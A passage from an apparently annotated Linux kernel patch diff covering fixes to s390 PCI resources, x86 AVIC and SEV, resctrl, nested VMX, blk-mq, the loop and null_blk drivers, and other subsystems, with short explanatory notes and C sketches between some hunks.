++	}
+ 	for_each_rb_entry(cert, certs)
+ 		if (intersects(safe_addr, size, cert->addr, cert->len)) {
+ 			safe_addr = cert->addr + cert->len;
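
The ipl_report fix extends an intersects()-and-retry scan to cover the component and certificate list headers themselves, not just their entries. The overlap test it builds on is the standard half-open interval check; a sketch with illustrative names, assuming the additions do not wrap:

#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* overlap iff each range starts before the other one ends */
static bool intersects(uint64_t a, uint64_t a_size, uint64_t b, uint64_t b_size)
{
	return a < b + b_size && b < a + a_size;
}

int main(void)
{
	assert(intersects(0x1000, 0x100, 0x10f0, 0x10));	/* touches tail */
	assert(!intersects(0x1000, 0x100, 0x1100, 0x10));	/* adjacent only */
	return 0;
}
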
+diff --git a/arch/s390/pci/pci.c b/arch/s390/pci/pci.c
+index 73cdc55393847..2c99f9552b2f5 100644
+--- a/arch/s390/pci/pci.c
++++ b/arch/s390/pci/pci.c
+@@ -544,8 +544,7 @@ static struct resource *__alloc_res(struct zpci_dev *zdev, unsigned long start,
+ 	return r;
+ }
+ 
+-int zpci_setup_bus_resources(struct zpci_dev *zdev,
+-			     struct list_head *resources)
++int zpci_setup_bus_resources(struct zpci_dev *zdev)
+ {
+ 	unsigned long addr, size, flags;
+ 	struct resource *res;
+@@ -581,7 +580,6 @@ int zpci_setup_bus_resources(struct zpci_dev *zdev,
+ 			return -ENOMEM;
+ 		}
+ 		zdev->bars[i].res = res;
+-		pci_add_resource(resources, res);
+ 	}
+ 	zdev->has_resources = 1;
+ 
+@@ -590,17 +588,23 @@ int zpci_setup_bus_resources(struct zpci_dev *zdev,
+ 
+ static void zpci_cleanup_bus_resources(struct zpci_dev *zdev)
+ {
++	struct resource *res;
+ 	int i;
+ 
++	pci_lock_rescan_remove();
+ 	for (i = 0; i < PCI_STD_NUM_BARS; i++) {
+-		if (!zdev->bars[i].size || !zdev->bars[i].res)
++		res = zdev->bars[i].res;
++		if (!res)
+ 			continue;
+ 
++		release_resource(res);
++		pci_bus_remove_resource(zdev->zbus->bus, res);
+ 		zpci_free_iomap(zdev, zdev->bars[i].map_idx);
+-		release_resource(zdev->bars[i].res);
+-		kfree(zdev->bars[i].res);
++		zdev->bars[i].res = NULL;
++		kfree(res);
+ 	}
+ 	zdev->has_resources = 0;
++	pci_unlock_rescan_remove();
+ }
+ 
+ int pcibios_device_add(struct pci_dev *pdev)
+diff --git a/arch/s390/pci/pci_bus.c b/arch/s390/pci/pci_bus.c
+index 6a8da1b742ae5..a99926af2b69a 100644
+--- a/arch/s390/pci/pci_bus.c
++++ b/arch/s390/pci/pci_bus.c
+@@ -41,9 +41,7 @@ static int zpci_nb_devices;
+  */
+ static int zpci_bus_prepare_device(struct zpci_dev *zdev)
+ {
+-	struct resource_entry *window, *n;
+-	struct resource *res;
+-	int rc;
++	int rc, i;
+ 
+ 	if (!zdev_enabled(zdev)) {
+ 		rc = zpci_enable_device(zdev);
+@@ -57,10 +55,10 @@ static int zpci_bus_prepare_device(struct zpci_dev *zdev)
+ 	}
+ 
+ 	if (!zdev->has_resources) {
+-		zpci_setup_bus_resources(zdev, &zdev->zbus->resources);
+-		resource_list_for_each_entry_safe(window, n, &zdev->zbus->resources) {
+-			res = window->res;
+-			pci_bus_add_resource(zdev->zbus->bus, res, 0);
++		zpci_setup_bus_resources(zdev);
++		for (i = 0; i < PCI_STD_NUM_BARS; i++) {
++			if (zdev->bars[i].res)
++				pci_bus_add_resource(zdev->zbus->bus, zdev->bars[i].res, 0);
+ 		}
+ 	}
+ 
+diff --git a/arch/s390/pci/pci_bus.h b/arch/s390/pci/pci_bus.h
+index e96c9860e0644..af9f0ac79a1b1 100644
+--- a/arch/s390/pci/pci_bus.h
++++ b/arch/s390/pci/pci_bus.h
+@@ -30,8 +30,7 @@ static inline void zpci_zdev_get(struct zpci_dev *zdev)
+ 
+ int zpci_alloc_domain(int domain);
+ void zpci_free_domain(int domain);
+-int zpci_setup_bus_resources(struct zpci_dev *zdev,
+-			     struct list_head *resources);
++int zpci_setup_bus_resources(struct zpci_dev *zdev);
+ 
+ static inline struct zpci_dev *zdev_from_bus(struct pci_bus *bus,
+ 					     unsigned int devfn)
+diff --git a/arch/x86/Makefile.um b/arch/x86/Makefile.um
+index b3c1ae084180d..d2e95d1d4db77 100644
+--- a/arch/x86/Makefile.um
++++ b/arch/x86/Makefile.um
+@@ -1,6 +1,12 @@
+ # SPDX-License-Identifier: GPL-2.0
+ core-y += arch/x86/crypto/
+ 
++#
++# Disable SSE and other FP/SIMD instructions to match normal x86
++#
++KBUILD_CFLAGS += -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx
++KBUILD_RUSTFLAGS += -Ctarget-feature=-sse,-sse2,-sse3,-ssse3,-sse4.1,-sse4.2,-avx,-avx2
++
+ ifeq ($(CONFIG_X86_32),y)
+ START := 0x8048000
+ 
+diff --git a/arch/x86/include/asm/sev-common.h b/arch/x86/include/asm/sev-common.h
+index b8357d6ecd47e..b63be696b776a 100644
+--- a/arch/x86/include/asm/sev-common.h
++++ b/arch/x86/include/asm/sev-common.h
+@@ -128,8 +128,9 @@ struct snp_psc_desc {
+ 	struct psc_entry entries[VMGEXIT_PSC_MAX_ENTRY];
+ } __packed;
+ 
+-/* Guest message request error code */
++/* Guest message request error codes */
+ #define SNP_GUEST_REQ_INVALID_LEN	BIT_ULL(32)
++#define SNP_GUEST_REQ_ERR_BUSY		BIT_ULL(33)
+ 
+ #define GHCB_MSR_TERM_REQ		0x100
+ #define GHCB_MSR_TERM_REASON_SET_POS	12
+diff --git a/arch/x86/include/asm/svm.h b/arch/x86/include/asm/svm.h
+index 0361626841bc0..236fda748ae96 100644
+--- a/arch/x86/include/asm/svm.h
++++ b/arch/x86/include/asm/svm.h
+@@ -256,20 +256,22 @@ enum avic_ipi_failure_cause {
+ 	AVIC_IPI_FAILURE_INVALID_BACKING_PAGE,
+ };
+ 
+-#define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(9, 0)
++#define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(8, 0)
+ 
+ /*
+- * For AVIC, the max index allowed for physical APIC ID
+- * table is 0xff (255).
++ * For AVIC, the max index allowed for physical APIC ID table is 0xfe (254), as
++ * 0xff is a broadcast to all CPUs, i.e. can't be targeted individually.
+  */
+ #define AVIC_MAX_PHYSICAL_ID		0XFEULL
+ 
+ /*
+- * For x2AVIC, the max index allowed for physical APIC ID
+- * table is 0x1ff (511).
++ * For x2AVIC, the max index allowed for physical APIC ID table is 0x1ff (511).
+  */
+ #define X2AVIC_MAX_PHYSICAL_ID		0x1FFUL
+ 
++static_assert((AVIC_MAX_PHYSICAL_ID & AVIC_PHYSICAL_MAX_INDEX_MASK) == AVIC_MAX_PHYSICAL_ID);
++static_assert((X2AVIC_MAX_PHYSICAL_ID & AVIC_PHYSICAL_MAX_INDEX_MASK) == X2AVIC_MAX_PHYSICAL_ID);
++
+ #define AVIC_HPA_MASK	~((0xFFFULL << 52) | 0xFFF)
+ #define VMCB_AVIC_APIC_BAR_MASK		0xFFFFFFFFFF000ULL
+ 
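
The svm.h hunk narrows the index mask and adds static_asserts proving the maximum physical IDs fit inside it, so a mismatch fails the build rather than corrupting table indexing at runtime. A sketch of that compile-time containment check with illustrative values:

#include <assert.h>

#define INDEX_MASK	0x1ffu		/* 9 usable index bits */
#define MAX_ID		0x1feu		/* top value reserved for broadcast */

/* masking the maximum must be a no-op, or the mask is too narrow */
static_assert((MAX_ID & INDEX_MASK) == MAX_ID, "MAX_ID overflows index mask");

int main(void) { return 0; }
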
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index 2c8ec5c717121..e228d58ee2645 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -2365,6 +2365,7 @@ static void mce_restart(void)
+ {
+ 	mce_timer_delete_all();
+ 	on_each_cpu(mce_cpu_restart, NULL, 1);
++	mce_schedule_work();
+ }
+ 
+ /* Toggle features for corrected errors */
+diff --git a/arch/x86/kernel/cpu/resctrl/ctrlmondata.c b/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
+index 1dafbdc5ac316..84f23327caed4 100644
+--- a/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
++++ b/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
+@@ -374,7 +374,6 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ {
+ 	struct resctrl_schema *s;
+ 	struct rdtgroup *rdtgrp;
+-	struct rdt_domain *dom;
+ 	struct rdt_resource *r;
+ 	char *tok, *resname;
+ 	int ret = 0;
+@@ -403,10 +402,7 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ 		goto out;
+ 	}
+ 
+-	list_for_each_entry(s, &resctrl_schema_all, list) {
+-		list_for_each_entry(dom, &s->res->domains, list)
+-			memset(dom->staged_config, 0, sizeof(dom->staged_config));
+-	}
++	rdt_staged_configs_clear();
+ 
+ 	while ((tok = strsep(&buf, "\n")) != NULL) {
+ 		resname = strim(strsep(&tok, ":"));
+@@ -451,6 +447,7 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ 	}
+ 
+ out:
++	rdt_staged_configs_clear();
+ 	rdtgroup_kn_unlock(of->kn);
+ 	cpus_read_unlock();
+ 	return ret ?: nbytes;
+diff --git a/arch/x86/kernel/cpu/resctrl/internal.h b/arch/x86/kernel/cpu/resctrl/internal.h
+index 5f7128686cfd2..0b5c6c76f6f7b 100644
+--- a/arch/x86/kernel/cpu/resctrl/internal.h
++++ b/arch/x86/kernel/cpu/resctrl/internal.h
+@@ -537,5 +537,6 @@ bool has_busy_rmid(struct rdt_resource *r, struct rdt_domain *d);
+ void __check_limbo(struct rdt_domain *d, bool force_free);
+ void rdt_domain_reconfigure_cdp(struct rdt_resource *r);
+ void __init thread_throttle_mode_init(void);
++void rdt_staged_configs_clear(void);
+ 
+ #endif /* _ASM_X86_RESCTRL_INTERNAL_H */
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index 87b670d540b84..c7f1c7cb1963b 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -78,6 +78,19 @@ void rdt_last_cmd_printf(const char *fmt, ...)
+ 	va_end(ap);
+ }
+ 
++void rdt_staged_configs_clear(void)
++{
++	struct rdt_resource *r;
++	struct rdt_domain *dom;
++
++	lockdep_assert_held(&rdtgroup_mutex);
++
++	for_each_alloc_capable_rdt_resource(r) {
++		list_for_each_entry(dom, &r->domains, list)
++			memset(dom->staged_config, 0, sizeof(dom->staged_config));
++	}
++}
++
+ /*
+  * Trivial allocator for CLOSIDs. Since h/w only supports a small number,
+  * we can keep a bitmap of free CLOSIDs in a single integer.
+@@ -2851,7 +2864,9 @@ static int rdtgroup_init_alloc(struct rdtgroup *rdtgrp)
+ {
+ 	struct resctrl_schema *s;
+ 	struct rdt_resource *r;
+-	int ret;
++	int ret = 0;
++
++	rdt_staged_configs_clear();
+ 
+ 	list_for_each_entry(s, &resctrl_schema_all, list) {
+ 		r = s->res;
+@@ -2862,20 +2877,22 @@ static int rdtgroup_init_alloc(struct rdtgroup *rdtgrp)
+ 		} else {
+ 			ret = rdtgroup_init_cat(s, rdtgrp->closid);
+ 			if (ret < 0)
+-				return ret;
++				goto out;
+ 		}
+ 
+ 		ret = resctrl_arch_update_domains(r, rdtgrp->closid);
+ 		if (ret < 0) {
+ 			rdt_last_cmd_puts("Failed to initialize allocations\n");
+-			return ret;
++			goto out;
+ 		}
+ 
+ 	}
+ 
+ 	rdtgrp->mode = RDT_MODE_SHAREABLE;
+ 
+-	return 0;
++out:
++	rdt_staged_configs_clear();
++	return ret;
+ }
+ 
+ static int mkdir_rdt_prepare(struct kernfs_node *parent_kn,
+diff --git a/arch/x86/kernel/ftrace_64.S b/arch/x86/kernel/ftrace_64.S
+index 2a4be92fd1444..6233c5b4c10b2 100644
+--- a/arch/x86/kernel/ftrace_64.S
++++ b/arch/x86/kernel/ftrace_64.S
+@@ -134,9 +134,11 @@ SYM_TYPED_FUNC_START(ftrace_stub)
+ 	RET
+ SYM_FUNC_END(ftrace_stub)
+ 
++#ifdef CONFIG_FUNCTION_GRAPH_TRACER
+ SYM_TYPED_FUNC_START(ftrace_stub_graph)
+ 	RET
+ SYM_FUNC_END(ftrace_stub_graph)
++#endif
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE
+ 
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index a428c62330d37..c680ac6342bb3 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -2183,9 +2183,6 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	struct ghcb *ghcb;
+ 	int ret;
+ 
+-	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+-		return -ENODEV;
+-
+ 	if (!fw_err)
+ 		return -EINVAL;
+ 
+@@ -2212,15 +2209,26 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	if (ret)
+ 		goto e_put;
+ 
+-	if (ghcb->save.sw_exit_info_2) {
+-		/* Number of expected pages are returned in RBX */
+-		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST &&
+-		    ghcb->save.sw_exit_info_2 == SNP_GUEST_REQ_INVALID_LEN)
+-			input->data_npages = ghcb_get_rbx(ghcb);
++	*fw_err = ghcb->save.sw_exit_info_2;
++	switch (*fw_err) {
++	case 0:
++		break;
+ 
+-		*fw_err = ghcb->save.sw_exit_info_2;
++	case SNP_GUEST_REQ_ERR_BUSY:
++		ret = -EAGAIN;
++		break;
+ 
++	case SNP_GUEST_REQ_INVALID_LEN:
++		/* Number of expected pages are returned in RBX */
++		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST) {
++			input->data_npages = ghcb_get_rbx(ghcb);
++			ret = -ENOSPC;
++			break;
++		}
++		fallthrough;
++	default:
+ 		ret = -EIO;
++		break;
+ 	}
+ 
+ e_put:
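
The sev.c rework above copies the raw firmware word to *fw_err first, then demultiplexes it in a switch: busy becomes -EAGAIN, an invalid length on the extended request becomes -ENOSPC alongside the expected page count, and everything else falls through to -EIO. A compact sketch of that mapping shape (bit positions and return values here are illustrative):

#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define ERR_BAD_LEN	(1ULL << 32)
#define ERR_BUSY	(1ULL << 33)

static int map_fw_err(uint64_t fw_err, int extended)
{
	switch (fw_err) {
	case 0:
		return 0;
	case ERR_BUSY:
		return -EAGAIN;		/* transient: caller may retry */
	case ERR_BAD_LEN:
		if (extended)
			return -ENOSPC;	/* caller resizes and retries */
		/* fallthrough */
	default:
		return -EIO;		/* anything unrecognized is fatal */
	}
}

int main(void)
{
	printf("%d %d %d\n", map_fw_err(0, 0),
	       map_fw_err(ERR_BUSY, 0), map_fw_err(ERR_BAD_LEN, 1));
	return 0;
}
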
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index 97ad0661f9639..e910ec5a0cc0b 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -27,19 +27,29 @@
+ #include "irq.h"
+ #include "svm.h"
+ 
+-/* AVIC GATAG is encoded using VM and VCPU IDs */
+-#define AVIC_VCPU_ID_BITS		8
+-#define AVIC_VCPU_ID_MASK		((1 << AVIC_VCPU_ID_BITS) - 1)
++/*
++ * Encode the arbitrary VM ID and the vCPU's default APIC ID, i.e the vCPU ID,
++ * into the GATag so that KVM can retrieve the correct vCPU from a GALog entry
++ * if an interrupt can't be delivered, e.g. because the vCPU isn't running.
++ *
++ * For the vCPU ID, use however many bits are currently allowed for the max
++ * guest physical APIC ID (limited by the size of the physical ID table), and
++ * use whatever bits remain to assign arbitrary AVIC IDs to VMs.  Note, the
++ * size of the GATag is defined by hardware (32 bits), but is an opaque value
++ * as far as hardware is concerned.
++ */
++#define AVIC_VCPU_ID_MASK		AVIC_PHYSICAL_MAX_INDEX_MASK
+ 
+-#define AVIC_VM_ID_BITS			24
+-#define AVIC_VM_ID_NR			(1 << AVIC_VM_ID_BITS)
+-#define AVIC_VM_ID_MASK			((1 << AVIC_VM_ID_BITS) - 1)
++#define AVIC_VM_ID_SHIFT		HWEIGHT32(AVIC_PHYSICAL_MAX_INDEX_MASK)
++#define AVIC_VM_ID_MASK			(GENMASK(31, AVIC_VM_ID_SHIFT) >> AVIC_VM_ID_SHIFT)
+ 
+-#define AVIC_GATAG(x, y)		(((x & AVIC_VM_ID_MASK) << AVIC_VCPU_ID_BITS) | \
++#define AVIC_GATAG(x, y)		(((x & AVIC_VM_ID_MASK) << AVIC_VM_ID_SHIFT) | \
+ 						(y & AVIC_VCPU_ID_MASK))
+-#define AVIC_GATAG_TO_VMID(x)		((x >> AVIC_VCPU_ID_BITS) & AVIC_VM_ID_MASK)
++#define AVIC_GATAG_TO_VMID(x)		((x >> AVIC_VM_ID_SHIFT) & AVIC_VM_ID_MASK)
+ #define AVIC_GATAG_TO_VCPUID(x)		(x & AVIC_VCPU_ID_MASK)
+ 
++static_assert(AVIC_GATAG(AVIC_VM_ID_MASK, AVIC_VCPU_ID_MASK) == -1u);
++
+ static bool force_avic;
+ module_param_unsafe(force_avic, bool, 0444);
+ 
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index df8995977ec2d..1d00f7824da1e 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -2999,7 +2999,7 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 					struct vmcs12 *vmcs12,
+ 					enum vm_entry_failure_code *entry_failure_code)
+ {
+-	bool ia32e;
++	bool ia32e = !!(vmcs12->vm_entry_controls & VM_ENTRY_IA32E_MODE);
+ 
+ 	*entry_failure_code = ENTRY_FAIL_DEFAULT;
+ 
+@@ -3025,6 +3025,13 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 					   vmcs12->guest_ia32_perf_global_ctrl)))
+ 		return -EINVAL;
+ 
++	if (CC((vmcs12->guest_cr0 & (X86_CR0_PG | X86_CR0_PE)) == X86_CR0_PG))
++		return -EINVAL;
++
++	if (CC(ia32e && !(vmcs12->guest_cr4 & X86_CR4_PAE)) ||
++	    CC(ia32e && !(vmcs12->guest_cr0 & X86_CR0_PG)))
++		return -EINVAL;
++
+ 	/*
+ 	 * If the load IA32_EFER VM-entry control is 1, the following checks
+ 	 * are performed on the field for the IA32_EFER MSR:
+@@ -3036,7 +3043,6 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 	 */
+ 	if (to_vmx(vcpu)->nested.nested_run_pending &&
+ 	    (vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_EFER)) {
+-		ia32e = (vmcs12->vm_entry_controls & VM_ENTRY_IA32E_MODE) != 0;
+ 		if (CC(!kvm_valid_efer(vcpu, vmcs12->guest_ia32_efer)) ||
+ 		    CC(ia32e != !!(vmcs12->guest_ia32_efer & EFER_LMA)) ||
+ 		    CC(((vmcs12->guest_cr0 & X86_CR0_PG) &&
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index f415498d3175c..d94ebd8acdfde 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -600,7 +600,8 @@ void __init sme_enable(struct boot_params *bp)
+ 	cmdline_ptr = (const char *)((u64)bp->hdr.cmd_line_ptr |
+ 				     ((u64)bp->ext_cmd_line_ptr << 32));
+ 
+-	cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer));
++	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0)
++		return;
+ 
+ 	if (!strncmp(buffer, cmdline_on, sizeof(buffer)))
+ 		sme_me_mask = me_mask;
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index fe0a3a882f465..aa67a52c5a069 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2711,6 +2711,7 @@ static void blk_mq_dispatch_plug_list(struct blk_plug *plug, bool from_sched)
+ 	struct blk_mq_hw_ctx *this_hctx = NULL;
+ 	struct blk_mq_ctx *this_ctx = NULL;
+ 	struct request *requeue_list = NULL;
++	struct request **requeue_lastp = &requeue_list;
+ 	unsigned int depth = 0;
+ 	LIST_HEAD(list);
+ 
+@@ -2721,10 +2722,10 @@ static void blk_mq_dispatch_plug_list(struct blk_plug *plug, bool from_sched)
+ 			this_hctx = rq->mq_hctx;
+ 			this_ctx = rq->mq_ctx;
+ 		} else if (this_hctx != rq->mq_hctx || this_ctx != rq->mq_ctx) {
+-			rq_list_add(&requeue_list, rq);
++			rq_list_add_tail(&requeue_lastp, rq);
+ 			continue;
+ 		}
+-		list_add_tail(&rq->queuelist, &list);
++		list_add(&rq->queuelist, &list);
+ 		depth++;
+ 	} while (!rq_list_empty(plug->mq_list));
+ 
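
The blk-mq hunk above keeps the requeue list in submission order by appending through a tail pointer-to-pointer (requeue_lastp) instead of prepending with rq_list_add(), which reversed it. A generic sketch of the O(1) tail-append idiom:

#include <stdio.h>
#include <stdlib.h>

struct req {
	int id;
	struct req *next;
};

int main(void)
{
	struct req *head = NULL, **lastp = &head;
	struct req *r, *next;
	int i;

	for (i = 0; i < 3; i++) {
		r = calloc(1, sizeof(*r));
		if (!r)
			return 1;
		r->id = i;
		*lastp = r;		/* append at the current tail... */
		lastp = &r->next;	/* ...then advance the tail slot */
	}
	for (r = head; r; r = r->next)
		printf("req %d\n", r->id);	/* 0, 1, 2: order preserved */
	for (r = head; r; r = next) {
		next = r->next;
		free(r);
	}
	return 0;
}
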
+diff --git a/drivers/acpi/pptt.c b/drivers/acpi/pptt.c
+index c91342dcbcd63..ced3eb15bd8b7 100644
+--- a/drivers/acpi/pptt.c
++++ b/drivers/acpi/pptt.c
+@@ -537,16 +537,19 @@ static int topology_get_acpi_cpu_tag(struct acpi_table_header *table,
+ static struct acpi_table_header *acpi_get_pptt(void)
+ {
+ 	static struct acpi_table_header *pptt;
++	static bool is_pptt_checked;
+ 	acpi_status status;
+ 
+ 	/*
+ 	 * PPTT will be used at runtime on every CPU hotplug in path, so we
+ 	 * don't need to call acpi_put_table() to release the table mapping.
+ 	 */
+-	if (!pptt) {
++	if (!pptt && !is_pptt_checked) {
+ 		status = acpi_get_table(ACPI_SIG_PPTT, 0, &pptt);
+ 		if (ACPI_FAILURE(status))
+ 			acpi_pptt_warn_missing();
++
++		is_pptt_checked = true;
+ 	}
+ 
+ 	return pptt;
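
The pptt.c fix caches not only the table pointer but also the fact that the lookup already ran, so firmware that genuinely lacks the table is not re-probed (and re-warned about) on every CPU hotplug. A single-threaded sketch of that negative-result cache (the kernel path holds its own locking):

#include <stdbool.h>
#include <stdio.h>

static int lookups;

static const char *slow_lookup(void)
{
	lookups++;
	return NULL;			/* models a missing ACPI table */
}

static const char *get_table(void)
{
	static const char *cached;
	static bool checked;

	if (!cached && !checked) {
		cached = slow_lookup();	/* may legitimately fail */
		checked = true;		/* remember the miss as well */
	}
	return cached;
}

int main(void)
{
	get_table();
	get_table();
	printf("lookups performed: %d\n", lookups);	/* 1, not 2 */
	return 0;
}
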
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 981464e561df1..793ae876918ce 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1853,35 +1853,44 @@ static blk_status_t loop_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 
+ static void loop_handle_cmd(struct loop_cmd *cmd)
+ {
++	struct cgroup_subsys_state *cmd_blkcg_css = cmd->blkcg_css;
++	struct cgroup_subsys_state *cmd_memcg_css = cmd->memcg_css;
+ 	struct request *rq = blk_mq_rq_from_pdu(cmd);
+ 	const bool write = op_is_write(req_op(rq));
+ 	struct loop_device *lo = rq->q->queuedata;
+ 	int ret = 0;
+ 	struct mem_cgroup *old_memcg = NULL;
++	const bool use_aio = cmd->use_aio;
+ 
+ 	if (write && (lo->lo_flags & LO_FLAGS_READ_ONLY)) {
+ 		ret = -EIO;
+ 		goto failed;
+ 	}
+ 
+-	if (cmd->blkcg_css)
+-		kthread_associate_blkcg(cmd->blkcg_css);
+-	if (cmd->memcg_css)
++	if (cmd_blkcg_css)
++		kthread_associate_blkcg(cmd_blkcg_css);
++	if (cmd_memcg_css)
+ 		old_memcg = set_active_memcg(
+-			mem_cgroup_from_css(cmd->memcg_css));
++			mem_cgroup_from_css(cmd_memcg_css));
+ 
++	/*
++	 * do_req_filebacked() may call blk_mq_complete_request() synchronously
++	 * or asynchronously if using aio. Hence, do not touch 'cmd' after
++	 * do_req_filebacked() has returned unless we are sure that 'cmd' has
++	 * not yet been completed.
++	 */
+ 	ret = do_req_filebacked(lo, rq);
+ 
+-	if (cmd->blkcg_css)
++	if (cmd_blkcg_css)
+ 		kthread_associate_blkcg(NULL);
+ 
+-	if (cmd->memcg_css) {
++	if (cmd_memcg_css) {
+ 		set_active_memcg(old_memcg);
+-		css_put(cmd->memcg_css);
++		css_put(cmd_memcg_css);
+ 	}
+  failed:
+ 	/* complete non-aio request */
+-	if (!cmd->use_aio || ret) {
++	if (!use_aio || ret) {
+ 		if (ret == -EOPNOTSUPP)
+ 			cmd->ret = ret;
+ 		else
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index 1f154f92f4c27..af419af9a0f4a 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1393,8 +1393,7 @@ static inline void nullb_complete_cmd(struct nullb_cmd *cmd)
+ 	case NULL_IRQ_SOFTIRQ:
+ 		switch (cmd->nq->dev->queue_mode) {
+ 		case NULL_Q_MQ:
+-			if (likely(!blk_should_fake_timeout(cmd->rq->q)))
+-				blk_mq_complete_request(cmd->rq);
++			blk_mq_complete_request(cmd->rq);
+ 			break;
+ 		case NULL_Q_BIO:
+ 			/*
+@@ -1655,7 +1654,8 @@ static blk_status_t null_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 	cmd->rq = bd->rq;
+ 	cmd->error = BLK_STS_OK;
+ 	cmd->nq = nq;
+-	cmd->fake_timeout = should_timeout_request(bd->rq);
++	cmd->fake_timeout = should_timeout_request(bd->rq) ||
++		blk_should_fake_timeout(bd->rq->q);
+ 
+ 	blk_mq_start_request(bd->rq);
+ 
+diff --git a/drivers/block/sunvdc.c b/drivers/block/sunvdc.c
+index fb855da971ee7..9fa821fa76b07 100644
+--- a/drivers/block/sunvdc.c
++++ b/drivers/block/sunvdc.c
+@@ -972,6 +972,8 @@ static int vdc_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 	print_version();
+ 
+ 	hp = mdesc_grab();
++	if (!hp)
++		return -ENODEV;
+ 
+ 	err = -ENODEV;
+ 	if ((vdev->dev_no << PARTITION_SHIFT) & ~(u64)MINORMASK) {
+diff --git a/drivers/clk/Kconfig b/drivers/clk/Kconfig
+index d79905f3e1744..5da82f2bdd211 100644
+--- a/drivers/clk/Kconfig
++++ b/drivers/clk/Kconfig
+@@ -92,7 +92,7 @@ config COMMON_CLK_RK808
+ config COMMON_CLK_HI655X
+ 	tristate "Clock driver for Hi655x" if EXPERT
+ 	depends on (MFD_HI655X_PMIC || COMPILE_TEST)
+-	depends on REGMAP
++	select REGMAP
+ 	default MFD_HI655X_PMIC
+ 	help
+ 	  This driver supports the hi655x PMIC clock. This
+diff --git a/drivers/cpuidle/cpuidle-psci-domain.c b/drivers/cpuidle/cpuidle-psci-domain.c
+index 821984947ed9b..fe06644725203 100644
+--- a/drivers/cpuidle/cpuidle-psci-domain.c
++++ b/drivers/cpuidle/cpuidle-psci-domain.c
+@@ -103,7 +103,8 @@ static void psci_pd_remove(void)
+ 	struct psci_pd_provider *pd_provider, *it;
+ 	struct generic_pm_domain *genpd;
+ 
+-	list_for_each_entry_safe(pd_provider, it, &psci_pd_providers, link) {
++	list_for_each_entry_safe_reverse(pd_provider, it,
++					 &psci_pd_providers, link) {
+ 		of_genpd_del_provider(pd_provider->node);
+ 
+ 		genpd = of_genpd_remove_last(pd_provider->node);
+diff --git a/drivers/firmware/xilinx/zynqmp.c b/drivers/firmware/xilinx/zynqmp.c
+index ff5cabe70a2b2..6587fa8570dc6 100644
+--- a/drivers/firmware/xilinx/zynqmp.c
++++ b/drivers/firmware/xilinx/zynqmp.c
+@@ -206,7 +206,7 @@ static int do_feature_check_call(const u32 api_id)
+ 	}
+ 
+ 	/* Add new entry if not present */
+-	feature_data = kmalloc(sizeof(*feature_data), GFP_KERNEL);
++	feature_data = kmalloc(sizeof(*feature_data), GFP_ATOMIC);
+ 	if (!feature_data)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 087147f09933a..3b8825a3e2336 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -1695,7 +1695,7 @@ static int psp_hdcp_initialize(struct psp_context *psp)
+ 	psp->hdcp_context.context.mem_context.shared_mem_size = PSP_HDCP_SHARED_MEM_SIZE;
+ 	psp->hdcp_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->hdcp_context.context.initialized) {
